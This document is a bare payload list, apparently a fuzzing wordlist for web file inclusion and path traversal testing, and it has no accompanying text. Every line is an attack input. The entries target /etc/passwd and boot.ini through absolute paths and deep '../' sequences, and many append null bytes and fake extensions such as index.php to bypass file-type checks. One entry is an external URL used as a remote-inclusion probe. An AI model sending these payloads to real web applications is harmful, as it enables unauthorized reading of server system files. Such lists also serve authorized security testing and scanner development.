http://www.google.fr/
/etc/passwd
/etc/passwd\0
c:\\boot.ini
c:\\boot.ini\0
../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd\0
../../../../../../../../../../boot.ini
../../../../../../../../../../boot.ini\0
/etc/passwd\0index.htm
/etc/passwd\0index.html
/etc/passwd\0index.php
/etc/passwd\0index.asp
/etc/passwd\0index.aspx
/etc/passwd\0index.css
c:\\boot.ini\0index.htm
c:\\boot.ini\0index.html
c:\\boot.ini\0index.php
c:\\boot.ini\0index.asp
c:\\boot.ini\0index.aspx
c:\\boot.ini\0index.css
../../../../../../../../../../etc/passwd\0index.htm
../../../../../../../../../../etc/passwd\0index.html
../../../../../../../../../../etc/passwd\0index.php
../../../../../../../../../../etc/passwd\0index.asp
../../../../../../../../../../etc/passwd\0index.aspx
../../../../../../../../../../etc/passwd\0index.css
../../../../../../../../../../boot.ini\0index.htm
../../../../../../../../../../boot.ini\0index.html
../../../../../../../../../../boot.ini\0index.php
../../../../../../../../../../boot.ini\0index.asp
../../../../../../../../../../boot.ini\0index.aspx
../../../../../../../../../../boot.ini\0index.css
